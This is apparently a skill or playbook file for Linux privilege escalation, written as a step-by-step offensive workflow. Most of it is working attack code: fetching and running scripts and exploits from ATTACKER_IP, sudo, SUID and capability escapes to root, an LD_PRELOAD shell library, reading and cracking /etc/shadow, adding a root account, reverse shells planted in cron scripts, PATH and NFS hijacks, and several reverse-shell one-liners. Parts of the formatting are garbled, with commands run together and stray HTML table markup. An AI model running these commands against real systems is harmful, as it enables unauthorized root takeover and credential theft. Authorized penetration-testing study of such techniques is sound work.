Linux Privilege Escalation

Purpose

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.

Inputs / Prerequisites

Required Access

Low-privilege shell access to target Linux system

Ability to execute commands (interactive or semi-interactive shell)

Network access for reverse shell connections (if needed)

Attacker machine for payload hosting and receiving shells

Technical Requirements

Understanding of Linux filesystem permissions and ownership

Familiarity with common Linux utilities and scripting

Knowledge of kernel versions and associated vulnerabilities

Basic understanding of compilation (gcc) for custom exploits

Recommended Tools

LinPEAS, LinEnum, or Linux Smart Enumeration scripts

Linux Exploit Suggester (LES)

GTFOBins reference for binary exploitation

John the Ripper or Hashcat for password cracking

Netcat or similar for reverse shells

Outputs / Deliverables

Primary Outputs

Root shell access on target system

Privilege escalation path documentation

System enumeration findings report

Recommendations for remediation

Evidence Artifacts

Screenshots of successful privilege escalation

Command output logs demonstrating root access

Identified vulnerability details

Exploited configuration files

Core Workflow

Phase 1: System Enumeration

Basic System Information

Gather fundamental system details for vulnerability research:

# Hostname and system role
hostname
Kernel version and architecture

uname -a
Detailed kernel information

cat /proc/version
Operating system details

cat /etc/issue
cat /etc/-release
Architecture

arch

User and Permission Enumeration

# Current user context
whoami
id
Users with login shells

cat /etc/passwd | grep -v nologin | grep -v false
Users with home directories

cat /etc/passwd | grep home
Group memberships

groups
Other logged-in users

w
who

Network Information

# Network interfaces
ifconfig
ip addr
Routing table

ip route
Active connections

netstat -antup
ss -tulpn
Listening services

netstat -l

Process and Service Enumeration

# All running processes
ps aux
ps -ef
Process tree view

ps axjf
Services running as root

ps aux | grep root

Environment Variables

# Full environment
env
PATH variable (for hijacking)

echo $PATH

Phase 2: Automated Enumeration

Deploy automated scripts for comprehensive enumeration:

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
LinEnum

./LinEnum.sh -t
Linux Smart Enumeration

./lse.sh -l 1
Linux Exploit Suggester

./les.sh

Transfer scripts to target system:

# On attacker machine
python3 -m http.server 8000
On target machine

wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Phase 3: Kernel Exploits

Identify Kernel Version

uname -r
cat /proc/version

Search for Exploits

# Use Linux Exploit Suggester
./linux-exploit-suggester.sh
Manual search on exploit-db

searchsploit linux kernel [version]

Common Kernel Exploits

Kernel Version	Exploit	CVE
2.6.x - 3.x	Dirty COW	CVE-2016-5195
4.4.x - 4.13.x	Double Fetch	CVE-2017-16995
5.8+	Dirty Pipe	CVE-2022-0847

Compile and Execute

# Transfer exploit source
wget http://ATTACKER_IP/exploit.c
Compile on target

gcc exploit.c -o exploit
Execute

./exploit

Phase 4: Sudo Exploitation

Enumerate Sudo Privileges

sudo -l

GTFOBins Sudo Exploitation

Reference https://gtfobins.github.io for exploitation commands:
# Example: vim with sudo sudo vim -c ':!/bin/bash' Example: find with sudo sudo find . -exec /bin/sh \; -quit Example: awk with sudo sudo awk 'BEGIN {system("/bin/bash")}' Example: python with sudo sudo python -c 'import os; os.system("/bin/bash")' Example: less with sudo sudo less /etc/passwd !/bin/bash
LD_PRELOAD Exploitation

When env_keep includes LD_PRELOAD:
// shell.c #include <stdio.h> #include <sys/types.h> #include <stdlib.h>
void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }
# Compile shared library gcc -fPIC -shared -o shell.so shell.c -nostartfiles Execute with sudo sudo LD_PRELOAD=/tmp/shell.so find
Phase 5: SUID Binary Exploitation
Find SUID Binaries
find / -type f -perm -04000 -ls 2>/dev/null find / -perm -u=s -type f 2>/dev/null
Exploit SUID Binaries

Reference GTFOBins for SUID exploitation:
# Example: base64 for file reading LFILE=/etc/shadow base64 "$LFILE" | base64 -d Example: cp for file writing cp /bin/bash /tmp/bash chmod +s /tmp/bash /tmp/bash -p Example: find with SUID find . -exec /bin/sh -p \; -quit
Password Cracking via SUID
# Read shadow file (if base64 has SUID) <div class="overflow-x-auto my-6"><table class="min-w-full divide-y divide-border border border-border"><thead><tr><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">base64 /etc/shadow</th><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">base64 -d > shadow.txt</th></tr></thead><tbody class="divide-y divide-border"></tbody></table></div> On attacker machine unshadow passwd.txt shadow.txt > hashes.txt john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Add User to passwd (if nano/vim has SUID)
# Generate password hash openssl passwd -1 -salt new newpassword Add to /etc/passwd (using SUID editor) newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Phase 6: Capabilities Exploitation
Enumerate Capabilities
getcap -r / 2>/dev/null
Exploit Capabilities
# Example: python with cap_setuid /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' Example: vim with cap_setuid ./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")' Example: perl with cap_setuid perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
Phase 7: Cron Job Exploitation
Enumerate Cron Jobs

# System crontab cat /etc/crontab User crontabs ls -la /var/spool/cron/crontabs/ Cron directories ls -la /etc/cron.

`Systemd timers`

systemctl list-timers

Exploit Writable Cron Scripts

# Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh        # Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
If cron references non-existent script in writable PATH

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh

Phase 8: PATH Hijacking

# Find SUID binary calling external command
strings /usr/local/bin/suid-binary
Shows: system("service apache2 start")
Hijack by creating malicious binary in writable PATH

export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary      # Execute SUID binary

Phase 9: NFS Exploitation

# On target - look for no_root_squash option
cat /etc/exports
On attacker - mount share and create SUID binary

showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs
Create and compile SUID shell

echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
On target - execute

/share/shell

Quick Reference

Enumeration Commands Summary

Purpose	Command
Kernel version	`uname -a`
Current user	`id`
Sudo rights	`sudo -l`
SUID files	`find / -perm -u=s -type f 2>/dev/null`
Capabilities	`getcap -r / 2>/dev/null`
Cron jobs	`cat /etc/crontab`
Writable dirs	`find / -writable -type d 2>/dev/null`
NFS exports	`cat /etc/exports`

Reverse Shell One-Liners

# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Python

python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
Netcat

nc -e /bin/bash ATTACKER_IP 4444
Perl

perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'

Key Resources

GTFOBins: https://gtfobins.github.io

LinPEAS: https://github.com/carlospolop/PEASS-ng

Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester

Constraints and Guardrails

Operational Boundaries

Verify kernel exploits in test environment before production use

Failed kernel exploits may crash the system

Document all changes made during privilege escalation

Maintain access persistence only as authorized

Technical Limitations

Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)

AppArmor/SELinux may restrict exploitation techniques

Container environments limit kernel-level exploits

Hardened systems may have restricted sudo configurations

Legal and Ethical Requirements

Written authorization required before testing

Stay within defined scope boundaries

Report critical findings immediately

Do not access data beyond scope requirements

Examples

Example 1: Sudo to Root via find

Scenario: User has sudo rights for find command

$ sudo -l
User user may run the following commands:
    (root) NOPASSWD: /usr/bin/find
$ sudo find . -exec /bin/bash \; -quit
id

uid=0(root) gid=0(root) groups=0(root)

Example 2: SUID base64 for Shadow Access

Scenario: base64 binary has SUID bit set

$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64
$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::
Crack offline with john

$ john --wordlist=rockyou.txt shadow.txt

Example 3: Cron Job Script Hijacking

Scenario: Root cron job executes writable script

$ cat /etc/crontab
    * root /opt/scripts/backup.sh
$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh
Wait 1 minute

$ /tmp/bash -p
id

uid=1000(user) gid=1000(user) euid=0(root)

Troubleshooting

Issue	Solutions
Exploit compilation fails	Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static`
Reverse shell not connecting	Check firewall; try ports 443/80; use staged payloads; check egress filtering
SUID binary not exploitable	Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges
Cron job not executing	Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab